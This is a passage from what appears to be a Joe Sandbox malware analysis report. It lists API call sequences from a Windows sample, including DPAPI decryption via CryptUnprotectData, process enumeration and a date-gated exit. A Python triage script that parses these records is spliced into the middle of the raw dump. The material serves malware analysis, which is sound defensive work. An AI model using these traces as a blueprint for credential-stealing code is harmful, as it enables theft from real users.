                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: %2{w$(C_$W_"y$e'r$z;
                                • API String ID: 0-448224942
                                • Opcode ID: 792f13bc479334a68a1cefcc7b2c1333244f55a50f296a9cc4b3b438c08492b9
                                • Instruction ID: dc9ab177a11c734b99299d6a7de820961ec24346967c4c434de101310594bd7b
                                • Opcode Fuzzy Hash: 792f13bc479334a68a1cefcc7b2c1333244f55a50f296a9cc4b3b438c08492b9
                                • Instruction Fuzzy Hash: EAB2F5F360C2049FE304AE2DEC8167AB7E5EF94720F1A493DEAC5C7744EA3598018697
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 009D1B72
                                  • Part of subcall function 009D1820: lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D184F
                                  • Part of subcall function 009D1820: lstrlen.KERNEL32(010B7060), ref: 009D1860
                                  • Part of subcall function 009D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 009D1887
                                  • Part of subcall function 009D1820: lstrcat.KERNEL32(00000000,00000000), ref: 009D1892
                                  • Part of subcall function 009D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 009D18C1
                                  • Part of subcall function 009D1820: lstrlen.KERNEL32(009E4FA0), ref: 009D18D3
                                  • Part of subcall function 009D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 009D18F4
                                  • Part of subcall function 009D1820: lstrcat.KERNEL32(00000000,009E4FA0), ref: 009D1900
                                  • Part of subcall function 009D1820: lstrcpy.KERNEL32(00000000,00000000), ref: 009D192F
                                • sscanf.NTDLL ref: 009D1B9A
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 009D1BB6
                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 009D1BC6
                                • ExitProcess.KERNEL32 ref: 009D1BE3
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                • String ID:
                                • API String ID: 3040284667-0
                                • Opcode ID: 8a807279d6b66faf445be96eadaae6ab53de2eaba4f03c2e0912339453819247
                                • Instruction ID: f2ed2c3f76b621d9b5bf10ec7e1869401e247d907686da8704938afca2b763d1
                                • Opcode Fuzzy Hash: 8a807279d6b66faf445be96eadaae6ab53de2eaba4f03c2e0912339453819247
                                • Instruction Fuzzy Hash: EA21F3B1518341AF8350DF69D88495FBBF9FFC8214F408A1EF599C7220EB30D5088BA2
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 009B775E
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009B7765
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 009B778D
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 009B77AD
                                • LocalFree.KERNEL32(?), ref: 009B77B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 641c692a26ebb583f5b7670e99aa98b6abf4f00b3522b755ec7f7ea4a5fe535f
                                • Instruction ID: cbe67745fe5ea660289c7e12e5e9863a91fc69c790aa5cee4992824c244f01cd
                                • Opcode Fuzzy Hash: 641c692a26ebb583f5b7670e99aa98b6abf4f00b3522b755ec7f7ea4a5fe535f
                                • Instruction Fuzzy Hash: F7011E75B40308BBEB10DBA49C4AFEA7B7CEB44B11F104155FA09EB2C0DAB0A904CB90
                                APIs
                                  • Part of subcall function 009D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 009D71FE
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009D3A96
                                • Process32First.KERNEL32(00000000,00000128), ref: 009D3AA9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 009D3ABF
                                  • Part of subcall function 009D7310: lstrlen.KERNEL32(------,009B5BEB), ref: 009D731B
                                  • Part of subcall function 009D7310: lstrcpy.KERNEL32(00000000), ref: 009D733F
                                  • Part of subcall function 009D7310: lstrcat.KERNEL32(?,------), ref: 009D7349
                                  • Part of subcall function 009D7280: lstrcpy.KERNEL32(00000000), ref: 009D72AE
                                • CloseHandle.KERNEL32(00000000), ref: 009D3BF7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                • String ID:
                                • API String ID: 1066202413-0
                                • Opcode ID: 16c8caf0c877153e556c688776aa8e884ffa831c0268bf393dccdd1546e75c51
                                • Instruction ID: 0cc99ee6bff78aaa88b1c09d20e853ac63d3af06321fe2b86c0ea74f1dd9cf40
                                • Opcode Fuzzy Hash: 16c8caf0c877153e556c688776aa8e884ffa831c0268bf393dccdd1546e75c51
                                • Instruction Fuzzy Hash: 48810830941204DFC714CF19D888BA5B7F5FB44316F29C1AAD808AB3A2D77A9D86CF81
                                APIs
                                • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 009BEA76
                                • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 009BEA7E
                                • lstrcat.KERNEL32(009DCFEC,009DCFEC), ref: 009BEB27
                                • lstrcat.KERNEL32(009DCFEC,009DCFEC), ref: 009BEB49
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$BinaryCryptStringlstrlen
                                • String ID:
                                • API String ID: 189259977-0
                                • Opcode ID: 818d492f299401924742286729f33626b1ee780c3833c6f4d40e2c9a15eec5a8
                                • Instruction ID: e621472f314f9c03a038a70e327fe7b2b3464392ab4319f7deb907576939eeac
                                • Opcode Fuzzy Hash: 818d492f299401924742286729f33626b1ee780c3833c6f4d40e2c9a15eec5a8
                                • Instruction Fuzzy Hash: 6531D375A40219ABDB109B58EC85FEFB77DDF84715F0081AAFA09E7241DBB05A04CBA1
                                APIs
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 009D40CD
                                • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 009D40DC
                                • RtlAllocateHeap.NTDLL(00000000), ref: 009D40E3
                                • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 009D4113
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptHeapString$AllocateProcess
                                • String ID:
                                • API String ID: 3825993179-0
                                • Opcode ID: a85a70cc1d20f7562c27b34ea9d2463b4e3833029436d4ef7769f23aeb242fe4
                                • Instruction ID: c720c6a5f2dab92c1434fdb4a61e2c442b5bf40ea626bd8f7ef0c1f865af484d
                                • Opcode Fuzzy Hash: a85a70cc1d20f7562c27b34ea9d2463b4e3833029436d4ef7769f23aeb242fe4
                                • Instruction Fuzzy Hash: B1012C70600205BBDB10DFA5DC89BAABBADEF85311F108159FE09C7340DE71D940DBA4
                                APIs
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 009B9B3B
                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 009B9B4A
                                • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 009B9B61
                                • LocalFree.KERNEL32 ref: 009B9B70
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: BinaryCryptLocalString$AllocFree
                                • String ID:
                                • API String ID: 4291131564-0
                                • Opcode ID: 1fcfe06732bbdce707171fcd1ee45df848ebf85a18af51fa241c205e069ab1e0
                                • Instruction ID: 1661676922a331de03b7a2a551b843f670d92a29657e95c74bc46f59762c9a65
                                • Opcode Fuzzy Hash: 1fcfe06732bbdce707171fcd1ee45df848ebf85a18af51fa241c205e069ab1e0
                                • Instruction Fuzzy Hash: 3DF01DB03503226BE7305F64AC89F967BACEF04B61F200114FA45EE2D1DBB49844CAA4
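The API listings in the records above are the part of this dump a triager actually reads: the GetSystemTime / sscanf / SystemTimeToFileTime / ExitProcess function at 009D1B72, the CryptUnprotectData routine at 009B775E, the CreateToolhelp32Snapshot walk at 009D3A96, and the CryptBinaryToStringA / CryptStringToBinaryA helpers. The script below is an added example, not code from the report or from Joe Sandbox. It parses the "• Api.MODULE(args), ref: ADDR" lines as they are rendered on this page, decodes the flag literals that appear in the argument columns (0x40000001 is CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, the 0x2 passed to CreateToolhelp32Snapshot is TH32CS_SNAPPROCESS, the 0x1 passed to CryptUnprotectData is CRYPTPROTECT_UI_FORBIDDEN) and tags each function with the ordered API sequence it matches. The tag labels (date gate, DPAPI decrypt, process enumeration) are the editor's interpretation of the call order and should be treated as assumptions, not as statements the report makes; the sample input is assembled from four of the records above.

```python
import re
from collections import namedtuple

# One "• Api.MODULE(args), ref: ADDR" line; a "Part of subcall function X:" prefix
# marks a call made by a callee, which is parsed but excluded from matching.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)")
Call = namedtuple("Call", "api args ref subcall")  # args is the raw argument column

def parse_records(text):
    """A record opens at an 'APIs' line and closes at 'Memory Dump Source'."""
    records, cur = [], None
    for line in text.splitlines():
        s = line.strip()
        if s == "APIs":
            cur = []
        elif s.startswith("Memory Dump Source"):
            direct = [c for c in cur or [] if not c.subcall]
            if direct:
                records.append(direct)
            cur = None
        elif cur is not None and (m := API_LINE.match(line)):
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            cur.append(Call(m["api"], args, int(m["ref"], 16), m["sub"] is not None))
    return records

# Documented Win32 constants for the flag columns seen in the report.
CRYPT_STRING_BITS = {0x1: "CRYPT_STRING_BASE64", 0x40000000: "CRYPT_STRING_NOCRLF"}
TH32CS_SNAPPROCESS = 0x2
CRYPTPROTECT_UI_FORBIDDEN = 0x1

def decode_crypt_string_flags(value):
    """dwFlags of CryptStringToBinaryA / CryptBinaryToStringA; 0 is CRYPT_STRING_BASE64HEADER."""
    names = [n for bit, n in CRYPT_STRING_BITS.items() if value & bit]
    leftover = value & ~(0x1 | 0x40000000)
    if leftover:
        names.append(f"0x{leftover:X}")
    return "|".join(names) if names else "CRYPT_STRING_BASE64HEADER"

# Ordered API subsequences worth a triage tag; the labels are the editor's interpretation.
SIGNATURES = [
    ("date gate: parse a date, compare with current time, ExitProcess",
     ["GetSystemTime", "sscanf", "SystemTimeToFileTime", "ExitProcess"]),
    ("DPAPI decrypt to narrow string (CryptUnprotectData -> WideCharToMultiByte)",
     ["CryptUnprotectData", "WideCharToMultiByte", "LocalFree"]),
    ("process enumeration (Toolhelp32 snapshot walk)",
     ["CreateToolhelp32Snapshot", "Process32First", "Process32Next"]),
    ("CryptoAPI string encode (CryptBinaryToStringA)", ["CryptBinaryToStringA"]),
]

def contains_in_order(seq, pattern):
    """True if every element of pattern occurs in seq in that order, gaps allowed."""
    it = iter(seq)
    return all(any(x == p for x in it) for p in pattern)

def annotate_flags(c):
    """Symbolic name for a known numeric flag argument, or None."""
    a = c.args
    if c.api in ("CryptStringToBinaryA", "CryptBinaryToStringA") and len(a) > 2 and a[2] != "?":
        return f"{c.api}@{c.ref:08X} dwFlags={decode_crypt_string_flags(int(a[2], 16))}"
    if c.api == "CreateToolhelp32Snapshot" and a and a[0] != "?" and int(a[0], 16) & TH32CS_SNAPPROCESS:
        return f"{c.api}@{c.ref:08X} dwFlags=TH32CS_SNAPPROCESS"
    if c.api == "CryptUnprotectData" and len(a) > 5 and a[5] != "?" and int(a[5], 16) & CRYPTPROTECT_UI_FORBIDDEN:
        return f"{c.api}@{c.ref:08X} dwFlags=CRYPTPROTECT_UI_FORBIDDEN"
    return None

def triage(text):
    """One summary per function record: lowest call-site address, tags, decoded flags."""
    out = []
    for calls in parse_records(text):
        names = [c.api for c in calls]
        out.append({
            "start": f"{min(c.ref for c in calls):08X}",
            "tags": [label for label, pat in SIGNATURES if contains_in_order(names, pat)],
            "flags": [f for f in map(annotate_flags, calls) if f],
        })
    return out

# Sample input assembled from four of the records above.
SAMPLE = """\
APIs
• GetSystemTime.KERNEL32(?), ref: 009D1B72
  • Part of subcall function 009D1820: lstrcpy.KERNEL32(00000000,009DCFEC), ref: 009D184F
• sscanf.NTDLL ref: 009D1B9A
• SystemTimeToFileTime.KERNEL32(?,?), ref: 009D1BB6
• ExitProcess.KERNEL32 ref: 009D1BE3
Memory Dump Source
APIs
• CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 009B778D
• WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 009B77AD
• LocalFree.KERNEL32(?), ref: 009B77B7
Memory Dump Source
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009D3A96
• Process32First.KERNEL32(00000000,00000128), ref: 009D3AA9
• Process32Next.KERNEL32(00000000,00000128), ref: 009D3ABF
Memory Dump Source
APIs
• CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 009D40CD
• CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 009D4113
Memory Dump Source
"""
```

Run `triage(SAMPLE)` to get one dict per function. Matching is on ordered subsequences rather than exact sequences because the report interleaves string-helper calls (lstrcpy, lstrcat) between the calls that carry meaning, so an exact match would break on every wrapper. The two CryptBinaryToStringA calls at 009D40CD and 009D4113 with the same flags are the usual size-query-then-encode pair, which is why the base64 tag fires once for the record rather than once per call.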
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                 • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351433845.0000000000EA0000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351684562.0000000000EA1000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351789058.000000000103B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1351805059.000000000103C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_9b0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #~$c?W|$z;$_\
                                • API String ID: 0-2423325474
                                • Opcode ID: 8a9d927321d0e4b460835320666b113274561f59ffeed9827c6a6a492ebe4499
                                • Instruction ID: 43348a2e0ac06056291f891a5d4723e9f85a78d0cd958bb65a096680dc44c817
                                • Opcode Fuzzy Hash: 8a9d927321d0e4b460835320666b113274561f59ffeed9827c6a6a492ebe4499
                                • Instruction Fuzzy Hash: BC42F6F3A08204AFE3046E2DEC4677AFBE9EF94720F1A453DE6C5C3744EA3558058696
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1351433845.0000000000BFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 009B0000, based on PE: true
                                • Associated: 00000000.00000002.1351235168.00000000009B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.00000000009E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A3E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000A5F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351253519.0000000000BE8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351416976.0000000000BFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E63000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1351433845.0000000000E91000.00000040.00000001.01000000.00000003.sdmpDownload File
